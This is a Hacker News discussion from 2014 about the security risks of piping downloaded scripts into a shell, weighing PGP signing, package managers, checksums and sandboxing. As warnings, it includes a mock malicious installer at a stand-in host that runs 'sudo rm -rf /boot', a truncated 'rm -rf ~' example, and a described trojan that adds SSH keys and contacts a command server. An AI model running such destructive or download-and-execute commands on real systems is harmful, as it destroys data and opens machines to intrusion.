curl | sh (curlpipesh.tumblr.com)
96 points by lelf on Nov 3, 2014 | 112 comments



Note that downloading an app (a .exe on Windows, or an Apple app) and running it is just as bad. Downloading an installer and running it is also insecure. So the question is... what is the proper alternative?

I think the best alternatives are app stores such as those found on iOS and Android, right?

However, that doesn't really fit open source. Is the way to install open source software to download the source and compile it from scratch? Well, that's also risky; you should check the source code first...? But that's undoable.

All in all, it comes down to "trust". Do you trust the website? If you don't care about security too much, then imho it makes sense to curl | sh.


I've written down some general principles we should follow, but any reasonable implementation of them seems pretty far off:

https://defuse.ca/triangle-of-secure-code-delivery.htm

tl;dr: (1) Reproducible builds, (2) Make sure everyone is getting the same thing (to detect targeted attacks) and (3) Cryptographic signing.

Package managers and appstores are the best we have right now, but they're missing (1) and (2). In the meantime, offering a pgp-signed installer file is a lot better than curl | sh.


I'm really surprised this hasn't gotten more attention from the commenters here. :(

^~ To the people scrolling by at 70 mph: READ THIS


`curl | sh` is protected by an SSL certificate issued by a CA that my system trusts.

"pgp-signed installer file" is protected by a key from a stranger.

Both are insecure.

Could you enumerate several points that show "pgp-signed installer file is __a lot better__ than curl | sh" ?


Say we're trying to download the PHP source code from php.net. If all that's protecting us is SSL, then if an adversary compromises the php.net servers (happens all the time, and actually has happened to PHP), they can immediately replace all the downloads with backdoored copies. Whereas with a PGP signature, the key can be stored off-line (even on an air-gapped system), so that even if the web server is compromised, the adversary can't make me believe the file is legit.

PGP can also be used in a trust-on-first-use manner. Get the public key once over an insecure channel, and if the attacker missed that single opportunity, you're safe until the key changes. With SSL, on the other hand, you're at risk every single time you make a connection, because any of hundreds of CAs has the power to sign that certificate, and as above, you have to assume the web server isn't compromised.

Another reason PGP is important is mirroring. Big F/OSS projects rely on mirrors volunteered by others. Even if those mirrors support SSL and the transport from the author to the mirror is encrypted, there's absolutely no guarantee that the mirrors themselves are not malicious. The mirrors could be backdooring their own files. The fact that you have an SSL connection to the mirror doesn't do anything to prevent this. But with PGP signatures, you're assured the files come from the software's developer and haven't been tampered with by the mirror.

So the difference is: SSL secures the connection between your browser and the web server. PGP ensures you're getting the file the software developer intended you to get. It's a semantic difference.
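To make that concrete, here's a rough sketch of the PGP workflow (the key ID, URLs, and file names are placeholders, not any real project's):

    # One-time: fetch the developer's public key (ideally verify its
    # fingerprint out-of-band; key ID below is a placeholder).
    gpg --keyserver pool.sks-keyservers.net --recv-keys 0x0123456789ABCDEF

    # Per release: fetch the tarball and its detached signature, then
    # verify before unpacking or running anything.
    curl -O https://example.org/project-1.0.tar.gz
    curl -O https://example.org/project-1.0.tar.gz.asc
    gpg --verify project-1.0.tar.gz.asc project-1.0.tar.gz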

I'd also argue hard against `curl | sh` for (assuming it exists) the psychological effect of teaching users that it's OK to pipe random things from the web into sh.


If an adversary compromises the php.net server, then naturally the files will be signed by the adversary's keys. In both cases, all you need is the ability to replace files (the package files, signature files, html instructions), nothing else. I don't see how gpg is __a lot more__ secure here.

You need some other channel to communicate what keys should sign what files. You need some other channel to import the keys. Catch 22.

"trust-on-first-use" do you mean something like the certificate pinning?

Let's consider https://www.torproject.org It uses GPG signatures for its packages.

If SSL is compromised as you say, then all I need to fool you is to give you files that are signed with my keys (unless you know that you should use the 0x416F061063FEE659 key (magic secure channel), you've already imported it (again the magic channel), and Tor never changes the key).

Where should I go to check that 0x416F061063FEE659 and pool.sks-keyservers.net are correct values (google?) if we assume that the key and the key server (and the connection to it) are not compromised?

Ask yourself: when was the last time you tried to check that the instructions showing the key fingerprint and the key server to use are genuine?

Also, if you have paper walls I wouldn't try too hard to make the door impenetrable. It is a trade-off: if you are downloading code from a stranger's repository, then you won't get much from replacing `curl https://github.com/... | sh` with a gpg-signed (by the same stranger) download.

Security is like onion rings: there are layers but it is only as strong as its weakest link. We know that a real adversary will just hack your machine if necessary.


No it's not, because MSI packages and EXEs are signed, so there is at least a chain of trust. SmartScreen kicks you in the face if it's not "known" by various metrics, and it's hard to get around that these days (as someone who just had to get an EV cert for their MSI). If you click through that and you don't know what the source was, then you're a muppet.

curl + bash is just suck it down and blam, it's on the machine. Hope you didn't do a sudo in the last few seconds...

http://www.nastybastard.com/funky-super-installer.sh:

   #!/bin/bash
   echo "mwuhahahaha"
   sudo rm -rf /boot


> No it's not because MSI packages and EXEs are signed

Sure, some are. But most software packages that a user is going to download aren't signed.


Right. And really, who checks signatures?

I'm a developer and I don't think I've ever checked an md5 checksum of a jarfile/gem/package I've downloaded. Nor have I ever been in an environment where that was ever mentioned. (I've mostly worked in small to medium businesses--I imagine that bigger orgs or the defense department might do this.)


You might be surprised. I just pulled up Process Explorer, which makes it easy to see which running apps are signed, and the only unsigned things I'm currently running are VLC, Evernote, and some Brother Printer utilities.

Things from Google, Intel, MS, VMWare, Spotify, Github, Dropbox, and even f.lux are all signed. Of course YMMV but the trend has been positive.

(A little worrisome is that there are two running Broadcom bluetooth apps that have explicitly revoked signatures...I wonder what that's about.)


SSL certificate signing provides basically the same level of trust as a signed installer. As long as you curl over https from the domain you trust, you're good.


Actually no, as that signs the communications and not the software. If the target server is compromised then you are screwed. Also, for example, there is no guarantee that github.com isn't serving malicious traffic from one user under a legitimate request, i.e. the poisoned sharecrop problem.

EV signed software is usually done off the internet. In our case we use a physical key to sign it offline and then upload.


> No it's not because MSI packages and EXEs are signed

Is it more difficult to provide your own fake exe installer than to man-in-the-middle the https that the curl examples use?


The question is, is it easier to place your code on that curl site. If there is some web-layer vulnerability, you can put your own code there.

With signed MSIs and EXEs, you'd need to get your code signed, which is probably more difficult than the web layer.


I get a little bit of heartburn over running arbitrary scripts downloaded from internet websites.

The easiest alternative is to run "curl <blah>", download the script, take a peek at the source, and only THEN follow up with the sh.

I mean, you're probably going to see a bunch of "download and install" commands, so you don't get much reassurance if you're worried that one of THOSE might be compromised too. But that's a problem inherent to unsigned internet installer scripts. At least you've somewhat mitigated the possibility that it's dumping your private SSH key to a server somewhere or some other blatantly malicious command.

On the other hand, the script might also include appropriate SHA1 verification commands, or be setting up a repository in a package manager, in which case it's pretty reasonable to trust the script.


My preferred hypothetical installer Trojan method is to make it append a value to ~/.ssh/authorized_keys and then ping a C&C server with the current username and IP ;)


You would still have to hope that sshd is enabled and accepting connections (which by default it shouldn't, at least on end-user distros).


True. I've mostly seen PHP devs using this to deploy composer onto staging and production servers, so it would work on them. ;)


The proper alternative is some sort of lightweight virtualization like Docker, with a proper security policy in place. You can mostly do this today

    curl <blah> | docker run --rm -i ubuntu sh
but the containerizing naturally locks down/virtualizes some stuff you might want the script to be doing, like installing stuff locally.

I think cleaning this up and making it friendly enough is a solvable UX problem, but I haven't quite solved it yet.


I can't tell if you're trolling, but "put some Windex on it" (or in this case, containerization) is hardly a solution, only a bad workaround. The root cause of curl | sh being a broken paradigm to begin with is left unaddressed.


I'm not sure that curl | sh is a "broken paradigm" -- no more broken than than running JavaScript in a browser. The only difference between the two is in the sandboxing.

The solution I'm proposing isn't to add Windex, but to cleanly wrap whatever curlpipesh is doing. Make it equivalent to opening a browser tab: interact with it safely, keep what you like, and throw everything away if you don't like the way things look.

Curlpipesh can be just like loading a site. We have the technology to do it; we just need to figure out the UX.


I think one of the larger issues with curl | sh is what could happen in the event of a network outage or early termination on the connection.

For example, if you're downloading a script that has a line like this

  rm -rf ~/.tmp/foo/bar
but if the HTTP connection is lost before the entire file is downloaded, and `rm -rf ~` was the end of one packet while `/.tmp/foo/bar` was in the next (lost) packet, you're screwed. The incomplete script will still be piped to sh and it's game over.


I had something like that happen once, but it worked out in my favor. I had misconfigured BIND, which I had intended to run just as a caching name server for my network, and it was listening for outside connections too. Some variant of the Lion worm found it and used a BIND bug to get onto my system.

It sent my password file to someone in China, started a scanner to look for other systems to infect, downloaded a .tar.gz file that contained a root kit to hide itself, unpacked the .tar.gz, and ran the install script contained therein to install the root kit.

Or rather, it tried to. I had ISDN at the time, and had noticed the modem lights heavily blinking even though I was not doing any internet activity. This confused me, and I pulled the plug on the modem. Turns out I pulled the plug while it was downloading the .tar.gz. It got most of the file, but not quite all of it. It lost the last file inside the archive--which happened to be the install script!

Without the install script, it could not install the root kit, and that made getting rid of the worm a heck of a lot easier.


This can be mitigated by wrapping your whole script in parens, as in:

  #!/usr/bin/env bash
  (
    # real work
  )


Why don't shells refuse to execute a final command if there's no trailing EOL character, to mitigate this very problem?


Why should shells encourage this behaviour (piping unknown stuff to them?)

You should at least download, verify the size and checksum (if available), take a peek at it, and only then run it.


Because you might be piping known stuff to them. Receiving a partial input stream is not necessarily reliant on networking.


OK, but the detection of partial vs complete script is not as simple as 'does last line have EOL'? There are various builtins that require an end token, like case/esac, if/fi, etc. Do these work properly when truncated at an arbitrary line?


Those control structures do work properly - the shell reads ahead until it finds the end token, and fails if it's absent.

It is true that there remains the problem of potential truncation exactly at the end of a top-level line, but I contend that "it stops running here" is a much easier thing to reason about (and, strictly, could always happen if hit with a SIGKILL anyway) than "does the meaning of this line change if we cut it off in a weird place".


In at least some of those cases, I would expect curl to exit with an error and the pipeline to abort.


All bash sees are bytes coming in on stdin, and eventually an EOF. It neither knows nor cares what caused the EOF.


Sure, but if the server response is not pipelined (as is probably often the case), then bash should never see anything.


HTTP pipelining is about reusing a TCP connection for multiple requests. It doesn't influence when curl outputs data and wouldn't apply here anyway. I don't think there's any mode which would cause curl to buffer the entire response before writing any of it.


Yes, I'm aware of how HTTP pipelining works. It was a poor choice of terminology. My point is that by default curl does buffer some of the response. And if the connection was terminated before the first buffer was output, then I would expect this to result in an error which would abort the shell pipeline.


Yes, in some cases curl won't produce any output, like if the web server is down, or the connection fails before anything is returned. And yes, it would also happen if curl buffers some of the response and then dies. I don't really see why that's interesting.


The default buffer size is typically the page size, which is typically 4096 bytes. I would expect a large number of these scripts to be less than 4096 bytes meaning curl would output nothing before producing an error and the partial script would never be evaluated.


That's the default buffer size for pipes, which won't matter here. When curl terminates, whatever's buffered in the pipe will be flushed. The only thing that could prevent downloaded data from being received by the shell would be internal buffering in curl, if it does any.


Good point. curl doesn't do any internal buffering. I was thinking that the pipeline should be aborted if curl exits with a non-zero status, but of course this is not the case.


Yeah, it would be nice if there were a way for a part of the pipeline to signal that something bad happened and everything should stop. Ideally, some sort of transaction system so the script is guaranteed to run fully or not at all. But instead we have this crazy thing.


Some scripts also detect this and are written so that no code is executed unless the file is complete. Of course, that's a minority.


Definitely including a checksum and validating that before executing would be ideal.
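A minimal sketch of that, assuming the publisher posts a SHA-256 digest somewhere you trust (the URL and digest here are placeholders):

    curl -sfLo install.sh https://example.com/install.sh
    # Compare against the published digest before running anything;
    # sha256sum -c fails (and && short-circuits) on a mismatch.
    echo "<expected-sha256>  install.sh" | sha256sum -c - && sh install.sh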


To elaborate, this is quite easy: you wrap the entire contents of the script into a function definition, then call the function as the last line.
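Something like this, for instance:

    #!/usr/bin/env bash
    main() {
      # real work goes here
      echo "installing..."
    }
    # Nothing above executes on its own; if the download is truncated,
    # either the parser hits EOF inside main() and errors out, or this
    # final call never arrives and nothing runs.
    main "$@"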


If you're really paranoid, download the MD5 checksum and PGP signature of the application release's source code tarball from the author's website using SSL. Then unpack the source (being careful to use a sandbox, because an exploit in gzip/tar/etc. might be bad) and examine the source code for any unexplained or dangerous behavior. Then compile and install it as a non-root user.

Personally, i'm totally comfortable with the idea of someone owning my box. The files I care about are backed up offline, I don't have many secrets, and the only accounts that would affect my life in general have passphrases, pins and multiple-factor auth tied to them. The worst thing someone could maybe do is impersonate me and cause havoc using my accounts, but I really don't see anyone having cause to do that. Anyway, I don't sweat it.

If you trust your distro, just verify the PGP keys of packages you download before installing, which is mostly automatic for most modern OSes.


""" Personally, i'm totally comfortable with the idea of someone owning my box. The files I care about are backed up offline, I don't have many secrets, and the only accounts that would affect my life in general have passphrases, pins and multiple-factor auth tied to them. The worst thing someone could maybe do is impersonate me and cause havoc using my accounts, but I really don't see anyone having cause to do that. Anyway, I don't sweat it. """

Are you trolling? This sounds like the same sort of argument from the "I don't have anything to hide. NSA/GCHQ can spy on me all they want" camp.


Uh, it's not an argument, it's my personal feelings and my personal opinions. It's OK if you don't feel the same way.


I look forward to you getting 0wned then. Just my personal feelings and personal opinions. :)


How do you enter your passphrases, pins, etc. if your box is controlled by someone else? How do you know there's no keylogger running? How do you use PGP if you don't care about the security of your private key?


I do assume there could be a keylogger. I'd enter a password into the computer, but passphrases would be spoken over the phone to a representative that I call, and pins are entered either over the phone or once I receive them from a 2FA source. I avoid using sensitive accounts online if I can do it over the phone or in person.

(part of why I want 2FA providers to verify an identity using two or more devices is so that if your workstation is compromised, it still couldn't complete the authentication without a secondary device, making mitm much more difficult; though obviously they could still hijack an existing connection on either device... a benefit would be that for example, an attacker couldn't use a hijacked connection to initiate a money transfer behind your back without having you confirm it on your mobile device as well)

If you are depending on PGP, and only install software from verified sources using secure connections, your private key is still secure. If you don't depend on PGP, you wouldn't care about the security of your private key. You could also do private key operations on an airgapped machine, which wouldn't depend on the security of your main workstation.


It's interesting to note that we essentially do the same with javascript in the browser, except the user doesn't even know there's some code that is automatically run.

The big difference, of course, is that javascript code runs in a sandboxed environment. Maybe we should create some kind of sandboxed sh? (I hardly believe it will ever catch on, seeing that so many sites tell you to run not `sh` but `sudo sh`... yeah, sure, why have unprivileged users, we should do everything as root anyway)


Well, the Unix approach to this is a sandbox application and a shell application, not a sandboxed shell application. Docker attempts many of those tasks.

On windows there's Sandboxie, which does more or less what you want as well. It creates a sandbox whose filesystem and internals can be modified by sandboxed applications without affecting the state of the REAL filesystem. Very nice utility for mitigating bad programming - I often use it to run multiple copies of applications that crash or refuse to launch multiple instances.


Trust is really the only solution. We as developers might be able to inspect some code before we run it, but if it is sufficiently complex we could spend months auditing it. It's even worse for the non-technical users who can't tell a hello world from a keylogger; there really is no solution other than some trust-based system.


Trust is a partial solution. You need to be able to make sure that you're only trusting those who are trustworthy. A part of that is assessment of trustworthiness, and a part is making sure you're aware who you're trusting (probably allowing delegation).


I agree, it is difficult to find a proper alternative.

App stores do have some advantages here, today. It's also true that they don't fit the open source model well. App stores define some root of trust for signing, but just like the CA model for HTTPS certificates, there are issues with that. App stores also bring a host of issues with user freedom. (Even the free ones can have this effect unintentionally: what percent of your coworkers know how to manage apt pinning? If one person on Ubuntu 10.04 has a working, installed package and wants to hand that exact (known working) version of it to a friend on Ubuntu 12.04, can they do it?)

PGP signed binaries are one major step in the right direction. More friendly tools and popularized workflows for this would help a lot of people avoid major moments of vulnerability.

PGP (or any other signing system) also leaves an interesting challenge, which is what to do in the case of key compromise. Revocation is hard. And say you want an audit log of all prior releases: what can you do?

We're all used to git having an immutable log of history by hash chaining, at this point. Is it time to start using systems like that to keep an auditable log of software releases, as well?

I've been working on something called "mdm" [1] that attempts to do an auditable, immutable chain of releases like this. It was originally designed to be a dependency manager for (arbitrary, language-agnostic, any binaries) software development needs, but I wonder if something like this is what the software distribution world needs to start evolving towards as well. Imagine if your end users could all verify that they have the same hash... and the same picture of historic releases from the same author, and the same picture of if the releaser's signing key changed, and so on.

I'd love to hear other thoughts on how hash chains and signatures can be made to intersect to tell the broadest story. The challenges are very real here.

---

[1] https://github.com/polydawn/mdm/


"appstores such as found on ios and android" are actually simpler versions of Linux package management, which fits very well with open-source. Packages are retrieved over HTTPS and signed by maintainers/authors. For distros like Lunar or Gentoo, the source is retrieved in a similar fashion and compiled locally.


I sense that the reason these kinds of things are growing in popularity is that there is a command-line renaissance occurring among certain kinds of developers. I'm guessing that about half of these pages are used principally by Ruby/Rails crowds, for example.

This is a natural outgrowth of Rails itself, which expects even the novice dev to do everything from the CLI. I also notice a certain amount of machismo surrounding this sort of thing, which means that the novices are that much more likely to blindly install things, in spite of the more senior devs blandly insisting that they should "read and understand the script before running it." This is ironic because of course they are novices, and learning how to do a security audit on a random bash script is a non-trivial affair, to put it most charitably. It's also ironic because Rails is supposed to be all about ease and convention, not auditing everything for oneself.

The designers of OSs did not have in mind non-experts using the CLI with su turned on (or even off) all the time. In fact, user-friendly OSs are designed to prevent non-experts from doing any damage, anywhere. In all, it seems like this sort of thing is circumventing basic protections provided by experts for non-experts, and that is probably not something to encourage.


1. These script-based solutions generally work across a variety of platforms where compiled executables would need to be customized.

2. They give an easy way to automatically download and install a tool in one pasteable command without having to manage downloads and deal with the inevitable extra UI of installer executables.

3. Why does one need to understand what a script is doing any more than one needs to understand what a downloaded installer executable is doing? At least with the shell scripts it seems like more of an option.


When I switched from RoR to Java I started to really understand these issues... with RoR I was using lots of open source code (how can someone be expected to read/comprehend all the code in C++ extension modules as well as a mound of Ruby?). I'm not sure what C++ extensions are actually capable of, but it just seems like a scary thought to be able to hook this deeply into the system. Personally I wouldn't want to use a lib that invokes some C++ unless it is from a REALLY reliable source.

So yeah the reason I bring up Java is I think there is strength in the notion of the "App Server" in the java world. It's like a partner for the OS that allows for somewhat of a security "air-lock". Even if using Docker or something to scale RoR / simulate the effect of an app server node, I just fundamentally think an OS has too much power.... a web app shouldn't have any access to it basically, except through known/monitored/regulated protocols and points of access. Basically, data can be handed to an "App server process" which in turn does some low-levelish system tasks, but the app itself can't do them.

Personally I think the app server approach also makes deployments/scaling easier and reduces the need for a sysadmin guru. RoR shops (and languages that follow a similar paradigm) really shouldn't be running any apps that handle sensitive info for example without a Linux guru and a senior Rails dev auditing app modules (or at least keeping up-to-date on existing security audits).

It's weird, those first few months of Java when you realize how limited you are by your EE or whatever type of container -- then it starts to feel natural/healthy. When architected properly, I don't think apps will ever suffer from this lack of freedom.


I don't see how this is less secure than downloading a program and running it. Or downloading some package that asks you to run an install script.

People will see no problem with curl | sh as long as they feel they can trust the source/site asking them to do so. They will be running the same risk as with downloading binaries or install packages.


The truncation issue is an interesting additional wrinkle, if unlikely.

I agree that, aside from that issue, the practice of many people is not materially worse than "curl | sh", but we should condemn that similarly.


Exactly. This is little more than cargo culting.


I'd at least save the script somewhere so I can audit it if something goes wrong after I run it.


Yeah. Of course nobody bothers with providing an installation guide that could be used to build RPM/DEB packages. Because everybody runs `curl | sh` on production machines to install random software.


Previously:

https://news.ycombinator.com/item?id=2420509

Nate Lawson's comment in particular.


https://news.ycombinator.com/item?id=2421012

Sadly, it has become more popular since you posted that comment.


My thing with piping curl to a shell was always that a severed connection will run a partial script, which can have weird consequences. I wrote about it a while back:

http://blog.seancassidy.me/dont-pipe-to-your-shell.html


I use something different:

    bash -c "$(curl -sfL git.io/wshare || echo "echo 'Installation failed'; exit 1")"
My script itself is the core file and the installer (I used the $BASH_EXECUTION_STRING to grab the source code), i.e. it doesn't download anything additionally. I'm also planning to add a build script that checks the hash of $BASH_EXECUTION_STRING to prevent tampering.


Would something like

    curl http://google.com/keylogger.sh > temp.sh && sh temp.sh
work?


More like:

    curl http://google.com/keylogger.sh > temp.sh
    less temp.sh   # actually read the fucking thing
    sh temp.sh
    rm temp.sh


Somewhat inexperienced with linux/unix. What's the purpose of "less temp.sh" here?


less is for viewing the file. It's interactive, and it's safer than cat because less (by default) displays terminal control characters as escapes instead of passing them through to the terminal.


It avoids that particular problem, yes. It is still inadvisable to do it over http, and checking a digital signature might be even better. Looking at the results might be better still if you have the expertise, though at that point it is more or less isomorphic to what everyone happily does in trusting repositories, makefiles in signed source tarballs, and similar.


I'd also check at least the size, and checksum/GPG signature if available.


Here is another curlpipesh: https://fixubuntu.com/


Except, that one shows the full source so you can copy, paste, review, and save it instead.


You can do that for all of these, just request the file directly and copy it out of the browser.


It's obviously somewhat prone to failure, as the script can't possibly work in every environment. But other than that as long as it's over https is there a security issue?

Obviously, a better alternative is a package manager, pulling from a repository for which you have gpg keys installed (such as Debian provides). But that's not always an option.

Even checking out a git repository and building from source seems as bad as curl | sh to me.


Both curl|sh and git checkouts tend to end up in production deploys so it's interesting to compare them.

Both introduce a point of failure if the remote host becomes unavailable and you need to deploy new machines.

The curl|sh method is vulnerable to change from the maintainer or any attacker who gets access to the storage layer. git is also vulnerable but requires a collision attack on SHA-1.
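That protection only really kicks in if you pin a known-good commit rather than deploying whatever HEAD happens to be; a sketch (repository URL and hash are made up):

    git clone https://github.com/example/tool.git
    cd tool
    # Deploy exactly this commit; serving different content under the
    # same hash would require a SHA-1 collision.
    git checkout 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b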


If you're running it in production then that's a problem. But I'd dare say that relying on an external "apt-get install xxx" is pretty bad practice in production (to deploy new machines).


I agree but most companies I know don't have the infrastructure or best-practices in place to avoid it. Copy-pasting the curl|sh is very low effort and will predictably end up in deploy code (if you have any).


If a git clone from github fails, I can still git clone from the last production machine I successfully cloned to. But this would be no different than curl -o installer.sh; rsync installer.sh; ssh remote@server 'sh installer.sh';

Mismatched SHA-1s are only noticeable when you have one to compare against. A git clone is always fresh, so if the attacker rewrote history, you'd not be warned.




`curl ... | sh` installations don't really bother me. The scripts tend to be short and commented, or at least readable. Sure beats running an opaque .pkg installer, which invariably asks for your password (presumably for no reason) and installs god-knows-what all over your hard drive.


Generally, yes, but some package managers have code-signing support, which means if you trust the authors, you can avoid potential hijacks.

At the end of the day, though, you're always going to trust someone with something.


Yes, but if you're doing curl ... | sh then you're not vetting the script you're running before you run it. If you were, you'd be running curl and sh as separate commands.


At least most of the examples are using https.


Mojolicio.us is a good counter-example. Unfortunately, they're not on the Tumblr yet.


Unfortunately the default way of installing Perl modules (the cpan command line tool) is just as insecure as curl | sh. Note that we have added an example of securely installing Mojo on the homepage as well, if you have configured Perl for signature verification - http://mojolicio.us/


What I do is simply copy the `curl foo | sh` oneliner into a text editor which does not run in a shell, and then copy the line from there into the console. This does not save you from having to download the script and actually audit that it does what it should.


I think not saving the script somewhere first makes it worse: you can't go back and inspect what it has actually done in the worst case scenario. I installed Rust the other day and had to read the whole script to be sure.


Most of these are downloading stuff over https, and sometimes from GitHub, so it really offers superior security to most AppStores and (signed) installers (as you can even look at the source, if you want to).


"superior security"?

If I can hack the endpoint (or the server that handles the 301 redirect to github), game over.


That goes for every piece of software you install. The only solution is to not install any software. And then hope that the preinstalled software on your device is OK.


OR

I could verify an asymmetric cryptographic signature based on a public key I already possess. As long as the private key is not stolen, an attacker who can breach the server cannot backdoor the software I'm downloading.


Which is exactly the same as you verifying the public HTTPS key of the server you're downloading the software from; in reality, the only thing that differs is the server you're targeting (the compilation server vs. the downloading server).


The downloading server is necessarily public facing, and the key is necessarily unlocked during operation. In a sense that's a difference in "the server you're targeting", but both are points in favor of pushing that to the compilation server.


The difference is that the private key is on the server that handles HTTPS requests. If the server gets owned, they can change stuff arbitrarily. Having an offline PGP key makes attacks more expensive.


How do you get the public key? I've heard the ssl certificate system that ships with browsers is broken, too.

Maybe it would be an improvement to create a small command line tool that ensures https connections and asks for a hash before running a script?
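A rough sketch of what such a tool could look like (the name, interface, and behavior here are all hypothetical):

    #!/usr/bin/env bash
    # vetted-run: refuse non-https URLs and require the caller to supply
    # the expected SHA-256 of the script before it gets executed.
    set -euo pipefail
    url=$1
    expected=$2
    case "$url" in
      https://*) ;;
      *) echo "refusing non-https URL: $url" >&2; exit 1 ;;
    esac
    tmp=$(mktemp)
    trap 'rm -f "$tmp"' EXIT
    curl -sfL "$url" -o "$tmp"
    echo "$expected  $tmp" | sha256sum -c - >/dev/null
    sh "$tmp"

Usage would be something like `vetted-run https://example.com/install.sh <sha256>`; of course you still have to get that hash from somewhere you trust, which is the same bootstrapping problem all over again.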


Key management is out of scope for this discussion. Ideally, it's shipped with your OS. If your OS is insecure, you're already vulnerable.


So you are a fan of the solution where you have to pay the OS provider a fee so that they certify your app? Sure, that's a possibility, but hardly conducive to the open web.


Nope. Don't try to put words in my mouth, please.

apt-get install php-composer is much better than curl https://getcomposer.org/installer | php


How do you get your app into the repository? Maybe for Linux you don't need to pay, but you still need to gain approval of the maintainers. Might be even more costly than simply paying up (as for Apple or Microsoft).


Or you can set up a PPA. :/


But then you are back to square one - how do you establish the trustworthiness of the PPA?


TOFU. Done.


I normally do a curl | less before doing a curl | sh and take a quick peek. Not perfect, but at least it's a step in the right direction. Like someone said, it's a matter of trust (but verify).


As already mentioned, save to disk first to avoid network connection failures messing you up. To avoid an extra command use "tee" to output to file while viewing it (i.e. it's "less" and ">" functionality combined).
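E.g. (the URL is a placeholder):

    curl -sfL https://example.com/install.sh | tee install.sh
    # read what tee just echoed (or open install.sh in an editor), then:
    sh install.sh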


'To avoid an extra command use "tee" to output to file while viewing it (i.e. it's "less" and ">" functionality combined).'

That's undesirable. First, because you should be making the decision about whether to run the script after you look at it, and if it's already running while you read it then it's probably too late. Second, because you should not be echoing possibly-malicious characters to the terminal - view with less or an editor, tee works like cat here.


"First, because you should be making the decision about whether to run the script after you look at it" - exactly, which is what my suggestion is. All I'm suggesting with tee is that it allows you to read in terminal what you are writing to file in the same command. The OP was downloading the script to view in less, and then downloading it again to execute. This method at least ensures that what you view is what you are going to execute but ...

"Second, because you should not be echoing possibly-malicious characters to the terminal" - this is something I know nothing about, so I would be (and maybe others) highly appreciative of any links about this class of attacks that you could post. Is it possible to execute malicious code while writing to STDOUT, or is it because you can hide malicious code with escape characters? Also, I don't quite understand the "cat" comment as we're not doing any file concatenation here?


"All I'm suggesting with tee is that it allows you to read in terminal what you are writing to file in the same command."

Gotcha. That makes more sense.

Regarding the second, I don't know whether there are presently any attacks in the wild for any commonly deployed setups (if anyone else does, I'd love to hear about them) but terminals are incredibly messy beasts once you start to throw nonprintable characters at them. Better not to expose that surface area.


Race condition. :)

Save it to disk, examine, then run.



What's the worst that could happen? It's only PHP. https://apigility.org/




